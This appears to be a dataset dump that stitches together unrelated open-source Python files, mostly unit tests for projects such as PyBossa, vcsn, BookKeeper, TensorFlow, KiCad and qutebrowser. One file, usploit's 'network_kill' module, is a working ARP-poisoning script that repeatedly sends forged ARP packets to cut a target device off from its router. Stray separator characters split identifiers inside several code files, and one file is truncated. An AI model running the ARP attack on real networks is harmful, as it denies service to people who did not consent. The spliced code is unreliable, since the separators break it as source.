AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
stitchfix/pybossa | test/test_authorization/__init__.py | Python | agpl-3.0 | 1,072 | 0 | # -*- coding: utf8 -*-
# This file is part of PyBossa.
#
# Copyright (C) 2013 SF Isle of Man Limited
#
# PyBossa is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBossa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See | the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBossa. If not, see <http://www.gnu.org/licenses/>.
from default import db
from mock import Mock
from pybossa.model.user import User
def mock_current_user(anonymous=True, admin=None, id=None):
mock = Mock(spec=User)
mock.is | _anonymous.return_value = anonymous
mock.is_authenticated.return_value = not anonymous
mock.admin = admin
mock.id = id
return mock
|
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/minimize.py | Python | gpl-3.0 | 5,086 | 0.007868 | #! /usr/bin/env python
import vcsn
from test import *
algos = ['hopcroft', 'moore', 'signature', 'weighted']
def aut(file):
return vcsn.automaton(filename = medir + "/" + file)
def file_to_string(file):
return open(medir + "/" + file, "r").read().strip()
def check(algo, aut, exp):
| if isinstance(algo, list):
for a in algo:
check(a, aut, exp)
else:
print("checking minimize with algorithm ", algo)
CHECK_EQ(exp, aut.minimize(algo))
# Chec | k that repeated minimization still gives the same type of
# automaton. We don't want to get partition_automaton of
# partition_automaton: one "layer" suffices.
CHECK_EQ(exp, aut.minimize(algo).minimize(algo))
# Cominimize.
#
# Do not work just on the transpose_automaton, to make sure it
# works as expected for "forward" automata (which did have one
# such bug!). So copy the transposed automaton.
t = aut.transpose().automaton(aut.context())
if isinstance(exp, str):
exp = vcsn.automaton(exp)
CHECK_ISOMORPHIC(exp.transpose(), t.cominimize(algo))
def xfail(algo, aut):
res = ''
try:
res = aut.minimize(algo)
except RuntimeError:
PASS()
else:
FAIL('did not raise an exception', str(res))
## Simple minimization test. The example comes from the "Théorie des
## langages" lecture notes by François Yvon & Akim Demaille.
## Automaton 4.23 at page 59, as of revision a0761d6.
a = aut("redundant.gv")
exp = file_to_string('redundant.exp.gv')
check('brzozowski', a, vcsn.automaton(exp))
check(algos, a, exp)
## An automaton equal to redundant.exp, with one transition removed.
a = aut('incomplete-non-trim.gv')
#xfail('brzozowski', a)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## An automaton equal to redundant.exp, with no initial states. It
## must be minimized into an empty automaton.
a = aut('no-initial-states.gv')
z = file_to_string('no-initial-states.exp.gv')
check('brzozowski', a, z)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## An automaton equal to redundant.exp, with no final states. It must
## be minimized into an empty automaton.
a = aut("no-final-states.gv")
check('brzozowski', a, z)
xfail('moore', a)
xfail('signature', a)
xfail('weighted', a)
## Non-regression testcase: ensure that moore works and produces a
## correct result even with no non-final states.
all_states_final = vcsn.context('lal_char(a), b').expression('a*').standard()
check('moore', all_states_final, all_states_final.minimize('signature'))
## Minimize an intricate automaton into a linear one.
a = vcsn.context('lal_char(a-k), b') \
.expression('[a-k]{10}') \
.standard()
exp = file_to_string("intricate.exp.gv")
check('brzozowski', a, vcsn.automaton(exp))
check(algos, a, exp)
## Compute the quotient of a non-deterministic automaton, in this case
## yielding the minimal deterministic solution.
a = vcsn.context('lal_char(a), b') \
.expression('a{2}*+a{2}*', 'trivial') \
.standard()
exp = file_to_string("small-nfa.exp.gv")
check('brzozowski', a, vcsn.automaton(exp))
xfail('moore', a)
check('signature', a, exp)
check('weighted', a, exp)
## A small weighted automaton.
a = aut("small-z.gv")
exp = file_to_string("small-z.exp.gv")
xfail('brzozowski', a)
xfail('moore', a)
xfail('signature', a)
check('weighted', a, exp)
## Non-lal automata.
a = vcsn.context('law_char(a-c), b').expression("abc(bc)*+acb(bc)*").standard()
exp = file_to_string("nonlal.exp.gv")
check("signature", a, exp)
check("weighted", a, exp)
## An already-minimal automaton. This used to fail with Moore,
## because of a subtly wrong optimization attempt in
## vcsn/algos/minimize.hh. The idea was to never store invalid_class
## as a key in target_class_to_c_states, so as to avoid some hash
## accesses in the (common) case of some state having no
## out-transition with some label, as it happens in incomplete
## automata. The optimization attempt consisted in setting a Boolean
## flag if the state being considered had no out-transition with the
## label being considered; when deciding whether to split a class,
## instead of the current test (2 <= target_class_to_c_states.size()),
## we used to test (2 <= (target_class_to_c_states.size() + flag)); at
## that point, however, it was possible to lose track of the state
## with no out-transitions, which was not in target_class_to_c_states.
## It remained associated to its old class identifier in
## state_to_class, which in the mean time would come to identify some
## subset of its old value.
a = vcsn.context('lal_char(ab), b').expression("a+ba").automaton()
check('brzozowski', a, a)
CHECK_ISOMORPHIC(a.minimize('moore'), a)
CHECK_ISOMORPHIC(a.minimize('signature'), a)
## Check minimization idempotency in the non-lal case as well.
a = vcsn.context('law_char(ab), b').expression("ab").standard()
CHECK_ISOMORPHIC(a.minimize('signature'), a)
CHECK_ISOMORPHIC(a.minimize('weighted'), a)
|
sijie/bookkeeper | stream/clients/python/tests/unit/bookkeeper/test_futures.py | Python | apache-2.0 | 3,929 | 0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import mock
import pytest
from bookkeeper.kv import futures, exceptions
def _future(*args, **kwargs):
return futures.Future(*args, **kwargs)
def test_constructor_defaults():
with mock.patch.object(threading, 'Event', autospec=True) as Event:
future = _future()
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is Event.return_value
Event.assert_called_once_with()
def test_constructor_explicit_completed():
completed = mock.sentinel.completed
future = _future(completed=completed)
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is completed
def test_cancel():
assert _future().cancel() is False
def test_cancelled():
assert _future().cancelled() is False
def test_running():
future = _future()
assert future.running() is True
future.set_result('foobar')
assert future.running() is False
def test_done():
future = _future()
assert future.done() is False
future.set_result('12345')
assert future.done() is True
def test_exception_no_error():
future = _future()
future.set_result('12345')
assert future.exception() is None
def test_exception_with_error():
future = _future()
error = RuntimeError('Something really bad happened.')
future.set_exception(error)
# Make sure that the exception that is returned is the batch's error.
# Also check the type to ensure the batch's error did not somehow
# change internally.
assert future.exception() is error
assert isinstance(future.exception(), RuntimeError)
with pytest.raises(RuntimeError):
future.result()
def test_exception_timeout():
future = _future()
with pytest.raises(exceptions.TimeoutError):
future.exception(timeout=0.01)
def test_result_no_error():
future = _future()
future.set_result('42')
assert future.result() == '42'
def test_result_with_error():
future = _future()
future.set_exception(RuntimeError('Something really bad happened.'))
with pytest.raises(RuntimeError):
future.result()
def test_add_done_callback_pending_batch():
future = _future()
callback = mock.Mock()
future.add_done_callback(callback)
assert len(future._callbacks) == 1
assert callback in future._callbacks
assert callback.call_count == 0
def test_add_done_callback_completed_batch():
| future = _future()
future.set_result('12345')
callback = mock.Mock(spec=())
future.add_done_callback(callback)
callback.assert_called_once_with(future)
def te | st_trigger():
future = _future()
callback = mock.Mock(spec=())
future.add_done_callback(callback)
assert callback.call_count == 0
future.set_result('12345')
callback.assert_called_once_with(future)
def test_set_result_once_only():
future = _future()
future.set_result('12345')
with pytest.raises(RuntimeError):
future.set_result('67890')
def test_set_exception_once_only():
future = _future()
future.set_exception(ValueError('wah wah'))
with pytest.raises(RuntimeError):
future.set_exception(TypeError('other wah wah'))
|
4shadoww/usploit | modules/network_kill.py | Python | mit | 1,182 | 0.002542 | # Copyright (C) 2015 – 2021 Noa-Emil Nissine | n (4shadoww)
from core.hakkuframework import *
import os
import signal
from time import sleep
import logging
import scapy.all as scapy
from core import colors
conf = {
"name": "network_kill",
"version": "1.0",
"shortdesc": "bloc | ks communication between router and target",
"author": "4shadoww",
"github": "4shadoww",
"email": "4shadoww0@gmail.com",
"initdate": "2016-02-24",
"lastmod": "2021-07-11",
"apisupport": False,
"needroot": 1
}
# List of variables
variables = OrderedDict((
('target', ['192.168.1.2', "target device's ip"]),
('router', ['192.168.1.1', "router's ip"]),
))
# Additional help notes
help_notes = colors.red+"this module will not work without root permission!\n this doesn't work if target refuses from arp request!"+colors.end
#simple changelog
changelog = "Version 1.0:\nrelease"
def run():
print_info("arp poisoning has been started!")
print_info("[*] ctrl + c to end")
packet = scapy.ARP()
packet.psrc = variables['router'][0]
packet.pdst = variables['target'][0]
while 1:
scapy.send(packet, verbose=False)
sleep(10)
|
benoitsteiner/tensorflow-opencl | tensorflow/contrib/bayesflow/python/kernel_tests/hmc_test.py | Python | apache-2.0 | 14,192 | 0.004087 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Hamiltonian Monte Carlo.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import special
from scipy import stats
from tensorflow.contrib.bayesflow.python.ops import hmc
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
# TODO(b/66964210): Test float16.
class HMCTest(test.TestCase):
def setUp(self):
    """Fix the log-gamma target distribution's parameters and seed the RNGs."""
    shape, rate = 5., 10.
    self._shape_param = shape
    self._rate_param = rate
    # Closed-form E[x] and E[exp(x)] for x ~ log-Gamma(shape, rate).
    self._expected_x = special.digamma(shape) - np.log(rate)
    self._expected_exp_x = shape / rate
    random_seed.set_random_seed(10003)
    np.random.seed(10003)
def _log_gamma_log_prob(self, x, event_dims=()):
    """Computes log-pdf of a log-gamma random variable.

    Args:
      x: Value of the random variable.
      event_dims: Dimensions not to treat as independent.

    Returns:
      log_prob: The log-pdf up to a normalizing constant.
    """
    unnormalized = self._shape_param * x - self._rate_param * math_ops.exp(x)
    return math_ops.reduce_sum(unnormalized, event_dims)
def _log_gamma_log_prob_grad(self, x, event_dims=()):
    """Computes log-pdf and gradient of a log-gamma random variable.

    Args:
      x: Value of the random variable.
      event_dims: Dimensions not to treat as independent. Default is (),
        i.e., all dimensions are independent.

    Returns:
      log_prob: The log-pdf up to a normalizing constant.
      grad: The gradient of the log-pdf with respect to x.
    """
    # exp(x) appears in both the density and its gradient; compute it once.
    exp_x = math_ops.exp(x)
    log_prob = math_ops.reduce_sum(
        self._shape_param * x - self._rate_param * exp_x, event_dims)
    grad = self._shape_param - self._rate_param * exp_x
    return log_prob, grad
def _n_event_dims(self, x_shape, event_dims):
    """Returns the total number of elements across the event dimensions.

    Args:
      x_shape: Shape (sequence of ints) of the sampled tensor.
      event_dims: Indices into `x_shape` that are treated as event dims.

    Returns:
      Product of the sizes of the event dimensions (1 for an empty list).
    """
    return np.prod([int(x_shape[i]) for i in event_dims])
def _integrator_conserves_energy(self, x, event_dims, sess,
                                 feed_dict=None):
    """Checks that leapfrog integration keeps the Hamiltonian nearly constant.

    Args:
      x: Tensor (or placeholder) holding the chain state.
      event_dims: Dimensions not to treat as independent.
      sess: TensorFlow session used to evaluate the graph.
      feed_dict: Optional feed dict for `x`; mutated in place with the
        integrator's step-size/step-count placeholders.
    """
    def potential_and_grad(x):
        # Potential energy is the negative log-density (and so is its grad).
        log_prob, grad = self._log_gamma_log_prob_grad(x, event_dims)
        return -log_prob, -grad

    step_size = array_ops.placeholder(np.float32, [], name='step_size')
    hmc_lf_steps = array_ops.placeholder(np.int32, [], name='hmc_lf_steps')

    if feed_dict is None:
        feed_dict = {}
    feed_dict[hmc_lf_steps] = 1000

    momentum = random_ops.random_normal(array_ops.shape(x))
    potential_0, grad_0 = potential_and_grad(x)
    # Hamiltonian = potential + kinetic (0.5 * ||momentum||^2).
    old_energy = potential_0 + 0.5 * math_ops.reduce_sum(momentum * momentum,
                                                         event_dims)
    _, new_momentum, potential_1, _ = (
        hmc.leapfrog_integrator(step_size, hmc_lf_steps, x,
                                momentum, potential_and_grad, grad_0))
    new_energy = potential_1 + 0.5 * math_ops.reduce_sum(
        new_momentum * new_momentum, event_dims)

    # Scale the step size down with the number of event dimensions so the
    # integrator stays stable.
    x_shape = sess.run(x, feed_dict).shape
    n_event_dims = self._n_event_dims(x_shape, event_dims)
    feed_dict[step_size] = 0.1 / n_event_dims
    old_energy_val, new_energy_val = sess.run([old_energy, new_energy],
                                              feed_dict)
    energy_drift = abs(old_energy_val - new_energy_val)
    logging.vlog(1, 'average energy change: {}'.format(energy_drift.mean()))
    # np.bool was a deprecated alias of the builtin bool (removed in
    # NumPy 1.24); use bool directly.
    self.assertAllEqual(np.ones_like(new_energy_val, dtype=bool),
                        energy_drift < 1.)
def _integrator_conserves_energy_wrapper(self, event_dims):
    """Tests the long-term energy conservation of the leapfrog integrator.

    The leapfrog integrator is symplectic, so for sufficiently small step
    sizes it should be possible to run it more or less indefinitely without
    the energy of the system blowing up or collapsing.

    Args:
      event_dims: A tuple of dimensions that should not be treated as
        independent. This allows for multiple chains to be run independently
        in parallel. Default is (), i.e., all dimensions are independent.
    """
    with self.test_session() as sess:
        x_ph = array_ops.placeholder(np.float32, name='x_ph')
        self._integrator_conserves_energy(
            x_ph, event_dims, sess, {x_ph: np.zeros([50, 10, 2])})
# Energy conservation for several choices of event (non-independent) dims.
def testIntegratorEnergyConservationNullShape(self):
    self._integrator_conserves_energy_wrapper([])

def testIntegratorEnergyConservation1(self):
    self._integrator_conserves_energy_wrapper([1])

def testIntegratorEnergyConservation2(self):
    self._integrator_conserves_energy_wrapper([2])

def testIntegratorEnergyConservation12(self):
    self._integrator_conserves_energy_wrapper([1, 2])

def testIntegratorEnergyConservation012(self):
    self._integrator_conserves_energy_wrapper([0, 1, 2])
def _chain_gets_correct_expectations(self, x, event_dims, sess,
                                     feed_dict=None):
    """Runs an HMC chain and checks E[x] and E[exp(x)] against closed forms.

    Args:
      x: Tensor (or placeholder) holding the chain's initial state.
      event_dims: Dimensions not to treat as independent.
      sess: TensorFlow session used to evaluate the graph.
      feed_dict: Optional feed dict for `x`; updated in place with the
        sampler's hyperparameter placeholders.
    """
    def log_gamma_log_prob(x):
        return self._log_gamma_log_prob(x, event_dims)

    step_size = array_ops.placeholder(np.float32, [], name='step_size')
    hmc_lf_steps = array_ops.placeholder(np.int32, [], name='hmc_lf_steps')
    hmc_n_steps = array_ops.placeholder(np.int32, [], name='hmc_n_steps')

    if feed_dict is None:
        feed_dict = {}
    feed_dict.update({step_size: 0.1, hmc_lf_steps: 2, hmc_n_steps: 300})

    sample_chain, acceptance_prob_chain = hmc.chain(
        [hmc_n_steps], step_size, hmc_lf_steps, x, log_gamma_log_prob,
        event_dims)
    acceptance_probs, samples = sess.run(
        [acceptance_prob_chain, sample_chain], feed_dict)
    # Discard the first half of the chain as burn-in.
    burn_in = feed_dict[hmc_n_steps] // 2
    samples = samples[burn_in:]

    expected_x_est = samples.mean()
    expected_exp_x_est = np.exp(samples).mean()
    logging.vlog(1, 'True E[x, exp(x)]: {}\t{}'.format(
        self._expected_x, self._expected_exp_x))
    logging.vlog(1, 'Estimated E[x, exp(x)]: {}\t{}'.format(
        expected_x_est, expected_exp_x_est))
    self.assertNear(expected_x_est, self._expected_x, 2e-2)
    self.assertNear(expected_exp_x_est, self._expected_exp_x, 2e-2)
    # Acceptance probabilities must be valid probabilities, and the step
    # size should be small enough for a healthy acceptance rate.
    self.assertTrue((acceptance_probs > 0.5).all())
    self.assertTrue((acceptance_probs <= 1.0).all())
def _chain_gets_correct_expectations_wrapper(self, event_dims):
    """Drives _chain_gets_correct_expectations from a [50, 10, 2] zero start."""
    with self.test_session() as sess:
        x_ph = array_ops.placeholder(np.float32, name='x_ph')
        self._chain_gets_correct_expectations(
            x_ph, event_dims, sess, {x_ph: np.zeros([50, 10, 2])})
# Chain-expectation checks for several choices of event dims.
def testHMCChainExpectationsNullShape(self):
    self._chain_gets_correct_expectations_wrapper([])

def testHMCChainExpectations1(self):
    self._chain_gets_correct_expectations_wrapper([1])

def testHMCChainExpectations2(self):
    self._chain_gets_correct_expectations_wrapper([2])

def testHMCChainExpectations12(self):
    self._chain_gets_correct_expectations_wrapper([1, 2])
def _kernel_leaves_target_invariant(self, initial_draws, event_d |
johnbeard/kicad-git | qa/testcases/test_002_board_class.py | Python | gpl-2.0 | 2,834 | 0.009174 | import code
import unittest
import os
import pcbnew
import pdb
import tempfile
from pcbnew import *
class TestBoardClass(unittest.TestCase):
    """Exercises pcbnew's BOARD wrapper: lookups, geometry and file round-trips."""

    def setUp(self):
        self.pcb = LoadBoard("data/complex_hierarchy.kicad_pcb")
        self.TITLE = "Test Board"
        self.COMMENT1 = "For load/save test"
        # NOTE(review): tempfile.mktemp() is race-prone; kept only for
        # behavior parity -- consider NamedTemporaryFile/mkstemp.
        self.FILENAME = tempfile.mktemp() + ".kicad_pcb"

    def test_pcb_find_module(self):
        """FindModule returns the module with the requested reference."""
        module = self.pcb.FindModule('P1')
        self.assertEqual(module.GetReference(), 'P1')

    def test_pcb_get_track_count(self):
        """GetNumSegmTrack grows as TRACKs are added to an empty board."""
        pcb = BOARD()
        self.assertEqual(pcb.GetNumSegmTrack(), 0)
        track0 = TRACK(pcb)
        pcb.Add(track0)
        self.assertEqual(pcb.GetNumSegmTrack(), 1)
        track1 = TRACK(pcb)
        pcb.Add(track1)
        self.assertEqual(pcb.GetNumSegmTrack(), 2)

    def test_pcb_bounding_box(self):
        """The bounding box of one track spans its length plus its width."""
        pcb = BOARD()
        track = TRACK(pcb)
        pcb.Add(track)
        #track.SetStartEnd(wxPointMM(10.0, 10.0),
        #                  wxPointMM(20.0, 30.0))
        track.SetStart(wxPointMM(10.0, 10.0))
        track.SetEnd(wxPointMM(20.0, 30.0))
        track.SetWidth(FromMM(0.5))
        #!!! THIS FAILS? == 0.0 x 0.0 ??
        #height, width = ToMM(pcb.ComputeBoundingBox().GetSize())
        bounding_box = pcb.ComputeBoundingBox()
        height, width = ToMM(bounding_box.GetSize())
        self.assertAlmostEqual(width, (30 - 10) + 0.5, 2)
        self.assertAlmostEqual(height, (20 - 10) + 0.5, 2)

    def test_pcb_get_pad(self):
        """GetPad hits an oval pad at its center and near both ends."""
        pcb = BOARD()
        module = MODULE(pcb)
        pcb.Add(module)
        pad = D_PAD(module)
        module.Add(pad)
        pad.SetShape(PAD_OVAL)
        pad.SetSize(wxSizeMM(2.0, 3.0))
        pad.SetPosition(wxPointMM(0, 0))
        # easy case
        p1 = pcb.GetPad(wxPointMM(0, 0))
        # top side
        p2 = pcb.GetPad(wxPointMM(0.9, 0.0))
        # bottom side
        p3 = pcb.GetPad(wxPointMM(0, 1.4))
        # TODO: get pad == p1 evaluated as true instead
        # of relying in the internal C++ object pointer
        self.assertEqual(pad.this, p1.this)
        self.assertEqual(pad.this, p2.this)
        self.assertEqual(pad.this, p3.this)

    def test_pcb_save_and_load(self):
        """Title-block data survives a SaveBoard/LoadBoard round trip."""
        pcb = BOARD()
        pcb.GetTitleBlock().SetTitle(self.TITLE)
        pcb.GetTitleBlock().SetComment1(self.COMMENT1)
        result = SaveBoard(self.FILENAME, pcb)
        self.assertTrue(result)
        pcb2 = LoadBoard(self.FILENAME)
        self.assertNotEqual(pcb2, None)
        tb = pcb2.GetTitleBlock()
        self.assertEqual(tb.GetTitle(), self.TITLE)
        self.assertEqual(tb.GetComment1(), self.COMMENT1)
        os.remove(self.FILENAME)

    #def test_interactive(self):
    #    code.interact(local=locals())
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
|
forkbong/qutebrowser | tests/unit/misc/test_msgbox.py | Python | gpl-3.0 | 3,129 | 0 | # Copyright 2015-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for qutebrowser.misc.msgbox."""
import pytest
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QMessageBox, QWidget
from qutebrowser.misc import msgbox
from qutebrowser.utils import utils
@pytest.fixture(autouse=True)
def patch_args(fake_args):
    """Ensure error windows are enabled by default for every test here."""
    fake_args.no_err_windows = False
def test_attributes(qtbot):
    """Test basic QMessageBox attributes."""
    parent = QWidget()
    qtbot.add_widget(parent)
    title = 'title'
    text = 'text'
    icon = QMessageBox.Critical
    buttons = QMessageBox.Ok | QMessageBox.Cancel
    box = msgbox.msgbox(parent=parent, title=title, text=text, icon=icon,
                        buttons=buttons)
    qtbot.add_widget(box)
    # macOS message boxes don't render window titles, so skip that check.
    if not utils.is_mac:
        assert box.windowTitle() == title
    assert box.icon() == icon
    assert box.standardButtons() == buttons
    assert box.text() == text
    assert box.parent() is parent
@pytest.mark.parametrize('plain_text, expected', [
    (True, Qt.PlainText),
    (False, Qt.RichText),
    (None, Qt.AutoText),
])
def test_plain_text(qtbot, plain_text, expected):
    """plain_text=True/False/None maps to Plain/Rich/Auto text format."""
    box = msgbox.msgbox(parent=None, title='foo', text='foo',
                        icon=QMessageBox.Information, plain_text=plain_text)
    qtbot.add_widget(box)
    assert box.textFormat() == expected
|
def test_finished_signal(qtbot):
    """Make sure we can pass a slot to be called when the dialog finished."""
    calls = []
    box = msgbox.msgbox(parent=None, title='foo', text='foo',
                        icon=QMessageBox.Information,
                        on_finished=lambda: calls.append(True))
    qtbot.add_widget(box)
    # Accepting the dialog emits finished(), which must invoke our slot.
    with qtbot.waitSignal(box.finished):
        box.accept()
    assert calls
def test_information(qtbot):
    """msgbox.information sets title, text and the Information icon."""
    box = msgbox.information(parent=None, title='foo', text='bar')
    qtbot.add_widget(box)
    if not utils.is_mac:  # window titles aren't rendered on macOS
        assert box.windowTitle() == 'foo'
    assert box.text() == 'bar'
    assert box.icon() == QMessageBox.Information
def test_no_err_windows(fake_args, capsys):
    """With --no-err-windows the box is only written to stderr, not shown."""
    fake_args.no_err_windows = True
    box = msgbox.information(parent=None, title='foo', text='bar')
    box.exec()  # should do nothing
    captured = capsys.readouterr()
    assert not captured.out
    assert captured.err == 'Message box: foo; bar\n'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.